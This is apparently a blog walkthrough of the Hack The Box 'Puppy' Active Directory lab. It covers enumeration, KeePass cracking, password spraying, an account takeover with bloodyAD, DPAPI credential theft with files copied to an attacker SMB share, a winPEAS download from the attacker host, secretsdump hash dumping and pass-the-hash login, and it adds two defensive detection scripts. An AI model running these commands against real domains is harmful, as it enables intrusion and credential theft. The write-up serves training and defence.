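This public account is dedicated to sharing tools and study notes, and to improving together with fellow practitioners :)
Machine information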
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Information gathering
nmap
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-19 16:03:21Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
50554/tcp open msrpc Microsoft Windows RPC
57096/tcp open msrpc Microsoft Windows RPC
Probing SMB
# Test
➜ puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
# --shares enumerates the shared directories
➜ puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!' --shares
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [+] Enumerated shares
SMB 10.10.11.70 445 DC Share Permissions Remark
SMB 10.10.11.70 445 DC ----- ----------- ------
SMB 10.10.11.70 445 DC ADMIN$ Remote Admin
SMB 10.10.11.70 445 DC C$ Default share
SMB 10.10.11.70 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.10.11.70 445 DC IPC$ READ Remote IPC
SMB 10.10.11.70 445 DC NETLOGON READ Logon server share
SMB 10.10.11.70 445 DC SYSVOL READ Logon server share
# --users enumerates the domain users
➜ puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!' --users
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [+] Enumerated domain user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 2 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper badpwdcount: 3 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams badpwdcount: 8 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver badpwdcount: 16 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards badpwdcount: 3 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt badpwdcount: 3 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest badpwdcount: 3 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator badpwdcount: 4 desc: Built-in account for administering the computer/domain
Among these shares, DEV is a custom one, so it is the obvious one to try connecting to, but at this point we have no permission to read the DEV share.
LDAP & BloodHound
# Sync the clock with the DC first
➜ data sudo ntpdate 10.10.11.70
[sudo] yefeng 的密码:
2025-05-28 02:51:13.382298 (+0800) +23929.543638 +/- 0.104321 10.10.11.70 s1 no-leap
CLOCK: time stepped by 23929.543638
# Collect information with BloodHound
➜ data bloodhound-python -d puppy.htb -dc dc.puppy.htb -c All -u levi.james -p KingofAkron2025! -ns 10.10.11.70 --dns-timeout 10
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 56S
Analysis shows that our [email protected] belongs to [email protected], and that [email protected] has write permission on [email protected].
Try adding [email protected] to the DEVELOPERS group, then probe the SMB shares again.
➜ puppy cat add_group.ldif
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB
➜ puppy ldapmodify -x -H ldap://puppy.htb -D "[email protected]" -w 'KingofAkron2025!' -f add_group.ldif
modifying entry "CN=DEVELOPERS,DC=PUPPY,DC=HTB"
Once the addition has succeeded, use cme to check whether the DEV share is now readable
➜ puppy crackmapexec smb dc.puppy.htb -u levi.james -p 'KingofAkron2025!' --shares
SMB dc.puppy.htb 445 DC DEV READ DEV-SHARE for PUPPY-DEVS
It is readable now, so connect with smbclient
➜ puppy smbclient \\\\10.10.11.70\\DEV -U 'levi.james'
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Mar 23 15:07:57 2025
.. D 0 Sun Mar 9 00:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 15:09:12 2025
Projects D 0 Sun Mar 9 00:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 10:25:46 2025
5080575 blocks of size 4096. 1647186 blocks available
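smb: \>
After connecting with smbclient, we find a recovery.kdbx file
A kdbx file is a database file that can be opened with KeePassXC, but most of them are protected by a password
Approach: convert the kdbx file into a hash with keepass2john, then use john to crack its password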
Keepass2john & John
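Note the john version issue here (the john shipped with the Linux distribution may be too old to include the KeePass hash mode)
General fix: download the bleeding-jumbo version of John, install all of John's dependencies, then compile it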
https://github.com/openwall/john
➜ puppy ls
hash KeePassXC-2.7.9-Win64.msi recovery.kdbx reports
➜ puppy keepass2john ./recovery.kdbx > hash
➜ puppy john-jumbo hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 256/256 AVX2])
Cracked 1 password hash (is in /home/yefeng/john-jumbo/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)
➜ puppy john-jumbo hash --show
recovery:liverpool
KeePassXC & Crackmapexec
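Opening the kdbx database in KeePassXC shows many passwords, but the username column is empty, so compare the entries against the users obtained with cme above
# Title : Password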
JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!
# Users
PUPPY.HTB\steph.cooper_adm
PUPPY.HTB\steph.cooper
PUPPY.HTB\jamie.williams
PUPPY.HTB\adam.silver
PUPPY.HTB\ant.edwards
PUPPY.HTB\levi.james
PUPPY.HTB\krbtgt
PUPPY.HTB\Guest
PUPPY.HTB\Administrator
Password spraying with kerbrute
➜ puppy kerbrute passwordspray --dc dc.puppy.htb -d puppy.htb user 'Antman2025!' -v
Version: dev (n/a) - 05/28/25 - Ronnie Flathers @ropnop
2025/05/28 03:56:52 > Using KDC(s):
2025/05/28 03:56:52 > dc.puppy.htb:88
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 > [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:53 > [+] VALID LOGIN: [email protected]:Antman2025!
2025/05/28 03:56:53 > Done! Tested 9 logins (1 successes) in 1.750 seconds
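Here we find that the adam.silver, Guest and krbtgt accounts are locked out
We obtained one set of credentials
PUPPY.HTB\ant.edwards:Antman2025!
All of them fail; the privileges obtained are still fairly low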
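From the defender's side, the spray above is visible on the DC as a burst of Kerberos failures for many users from one source. The following is an added example, not part of the original write-up: it assumes Security events 4768/4771 have already been reduced to simple records, and the timestamps and the workstation address 10.10.11.50 are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos result codes carried by Security events 4768 and 4771
SUCCESS, CLIENT_REVOKED, PREAUTH_FAILED = "0x0", "0x12", "0x18"
T0 = datetime(2025, 5, 28, 3, 56, 52)

def ev(offset_s, user, status, ip="10.10.16.69"):
    """One constructed, simplified 4768/4771 record."""
    return {"time": T0 + timedelta(seconds=offset_s), "user": user,
            "status": status, "ip": ip}

# Constructed sample modelled on the kerbrute run above, plus one user
# mistyping a password from a workstation (10.10.11.50 is made up).
SAMPLE = [
    ev(0.1, "adam.silver", CLIENT_REVOKED),
    ev(0.1, "Guest", CLIENT_REVOKED),
    ev(0.1, "krbtgt", CLIENT_REVOKED),
    ev(0.2, "steph.cooper_adm", PREAUTH_FAILED),
    ev(0.2, "steph.cooper", PREAUTH_FAILED),
    ev(0.3, "jamie.williams", PREAUTH_FAILED),
    ev(0.3, "levi.james", PREAUTH_FAILED),
    ev(0.4, "Administrator", PREAUTH_FAILED),
    ev(1.0, "ant.edwards", SUCCESS),
    ev(300, "jamie.williams", PREAUTH_FAILED, ip="10.10.11.50"),
    ev(310, "jamie.williams", PREAUTH_FAILED, ip="10.10.11.50"),
    ev(325, "jamie.williams", SUCCESS, ip="10.10.11.50"),
]

def detect_spray(events, window=timedelta(seconds=60), min_users=5):
    """Flag sources that fail for many distinct users inside one window and
    report which accounts authenticated successfully from the same source."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        for i, first in enumerate(evs):
            win = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            failed = {e["user"] for e in win if e["status"] != SUCCESS}
            if len(failed) >= min_users:
                alerts.append({
                    "ip": ip,
                    "failed_users": sorted(failed),
                    "locked": sorted(e["user"] for e in win
                                     if e["status"] == CLIENT_REVOKED),
                    "succeeded": sorted({e["user"] for e in win
                                         if e["status"] == SUCCESS}),
                })
                break  # one alert per source is enough
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(SAMPLE):
        print(alert)
```

The `succeeded` list is the part to act on first: a success buried in a spray window marks the account whose password should be rotated.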
Analysis in BloodHound
The ADAM.SILVER user
Here we can take over the ADAM user
bloodyAD -d <domain> -u <username> -p <password> --dc-ip <DC IP> <action> <arguments>
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver yefeng@123
➜ puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
[-] ['LOCKOUT', 'ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
➜ puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
[+] Old owner S-1-5-21-1487982659-1829050783-2281216199-512 is now replaced by ant.edwards on adam.silver
➜ puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!
Traceback (most recent call last):
File "/usr/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
output = args.func(conn, **params)
File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 241, in password
raise e
File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 86, in password
conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 285, in bloodymodify
raise err
msldap.commons.exceptions.LDAPModifyException:
Password can't be changed before -2 days, 23:49:52.806422 because of the minimum password age policy.
The last command, the password change, failed because of Active Directory's Minimum Password Age policy.
import ldap3

# Connect to the LDAP server
server = ldap3.Server('10.10.11.70', port=389, use_ssl=False)
conn = ldap3.Connection(
    server,
    user='CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB',
    password='Antman2025!',
    auto_bind=True
)

# Set pwdLastSet to 0 (meaning "password never set")
success = conn.modify(
    'CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB',
    {
        'pwdLastSet': [(ldap3.MODIFY_REPLACE, [0])]
    }
)

# Print the result
if success:
    print("[+] pwdLastSet 修改成功")
else:
    print("[-] 修改失败:", conn.result)
➜ puppy python setpassword.py
[+] pwdLastSet 修改成功
➜ puppy ldapsearch -x -H ldap://puppy.htb -D "[email protected]" -w 'Antman2025!' -b "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB" pwdLastSet
# extended LDIF
#
# LDAPv3
# base <CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB> with scope subtree
# filter: (objectclass=*)
# requesting: pwdLastSet
#
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
pwdLastSet: 0
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
➜ puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver yefeng@123
[+] Password changed successfully!
Running the Python script sets pwdLastSet to 0 successfully, after which the password change is retried and goes through
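Both the group self-add earlier and the account changes in this section leave account-management events on the DC. The following is an added example, not part of the original write-up, of correlating them; it assumes "Audit User Account Management" and "Audit Security Group Management" are enabled, that the steps surface as events 4728, 4722, 4738 and 4724, and it uses constructed records reduced to account names with a hypothetical admin allow-list.

```python
from datetime import datetime, timedelta

# Security event IDs from "Audit User Account Management" and
# "Audit Security Group Management"
GROUP_MEMBER_ADDED = 4728   # member added to a security-enabled global group
ACCOUNT_ENABLED = 4722
ACCOUNT_CHANGED = 4738      # attribute change on a user object
PASSWORD_RESET = 4724       # password set without knowing the old one

T0 = datetime(2025, 5, 28, 4, 0, 0)  # constructed base time

def ev(event_id, minutes, actor, target, member=None):
    """One constructed record, reduced to sAMAccountNames."""
    return {"id": event_id, "time": T0 + timedelta(minutes=minutes),
            "actor": actor, "target": target, "member": member}

# Constructed sample modelled on the steps in this write-up, plus one
# routine reset by an administrator that must not alert.
SAMPLE = [
    ev(GROUP_MEMBER_ADDED, 0, "levi.james", "DEVELOPERS", member="levi.james"),
    ev(ACCOUNT_ENABLED, 60, "ant.edwards", "adam.silver"),
    ev(ACCOUNT_CHANGED, 65, "ant.edwards", "adam.silver"),
    ev(PASSWORD_RESET, 66, "ant.edwards", "adam.silver"),
    ev(PASSWORD_RESET, 90, "Administrator", "jamie.williams"),
]

def find_takeovers(events, admins=frozenset({"Administrator"}),
                   window=timedelta(minutes=15)):
    """Return (rule, actor, target) tuples for two patterns: an account adding
    itself to a group, and a non-admin resetting another user's password
    shortly after enabling or modifying that same user."""
    findings = []
    for e in events:
        if e["id"] == GROUP_MEMBER_ADDED and e["actor"] == e["member"]:
            findings.append(("self-added-to-group", e["actor"], e["target"]))
    for reset in events:
        if (reset["id"] != PASSWORD_RESET or reset["actor"] in admins
                or reset["actor"] == reset["target"]):
            continue
        prepared = any(
            e["id"] in (ACCOUNT_ENABLED, ACCOUNT_CHANGED)
            and (e["actor"], e["target"]) == (reset["actor"], reset["target"])
            and timedelta(0) <= reset["time"] - e["time"] <= window
            for e in events)
        if prepared:
            findings.append(("reset-after-modification",
                             reset["actor"], reset["target"]))
    return findings

if __name__ == "__main__":
    for finding in find_takeovers(SAMPLE):
        print(finding)
```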
evil-winrm & information gathering
evil-winrm -i dc.puppy.htb -u adam.silver -p 'yefeng@123'
Get user.txt
➜ puppy evil-winrm -i dc.puppy.htb -u adam.silver -p 'yefeng@123'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> dir
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ..
*Evil-WinRM* PS C:\Users\adam.silver> dir
Directory: C:\Users\adam.silver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/28/2025 12:31 PM 3D Objects
d-r--- 2/28/2025 12:31 PM Contacts
d-r--- 3/12/2025 12:09 PM Desktop
d-r--- 3/5/2025 10:16 AM Documents
d-r--- 2/28/2025 12:31 PM Downloads
d-r--- 2/28/2025 12:31 PM Favorites
d-r--- 2/28/2025 12:31 PM Links
d-r--- 2/28/2025 12:31 PM Music
d-r--- 2/28/2025 12:31 PM Pictures
d-r--- 2/28/2025 12:31 PM Saved Games
d-r--- 2/28/2025 12:31 PM Searches
d-r--- 2/28/2025 12:31 PM Videos
*Evil-WinRM* PS C:\Users\adam.silver> cd Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir
Directory: C:\Users\adam.silver\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/27/2025 10:50 AM 34 user.txt
Invoke-WebRequest -Uri "http://10.10.16.69/winPEASx64.exe" -OutFile "C:\Users\adam.silver\Desktop\winPEASx64.exe"
Run the winPEASx64.exe file
A hidden folder is found
After extracting it, we find
steph.cooper : ChefSteph2025!
The credentials are verified successfully
➜ puppy crackmapexec smb dc.puppy.htb -u steph.cooper -p 'ChefSteph2025!'
SMB dc.puppy.htb 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB dc.puppy.htb 445 DC [+] PUPPY.HTB\steph.cooper:ChefSteph2025!
DPAPI attack
First start an SMB share on our own machine
➜ puppy mkdir share
➜ puppy impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
Copy the masterkey and the credential file to the SMB share we started
*Evil-WinRM* PS C:\Users> cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy .\556a2412-1275-4ccf-b721-e6a0b4f90407 \\10.10.16.69\share
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> copy C8D69EBE9A43E9DEBF6B5FBD48B521B9 \\10.10.16.69\share
Decrypt them with the impacket-dpapi module
➜ share impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
➜ share impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
Try to dump the hashes
➜ share impacket-secretsdump steph.cooper_adm:'FivethChipOnItsWay2025!'@puppy.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Log in with the hash via evil-winrm
evil-winrm -i dc.puppy.htb -u Administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'
Originally published on the WeChat public account 夜风Sec: HTB - Puppy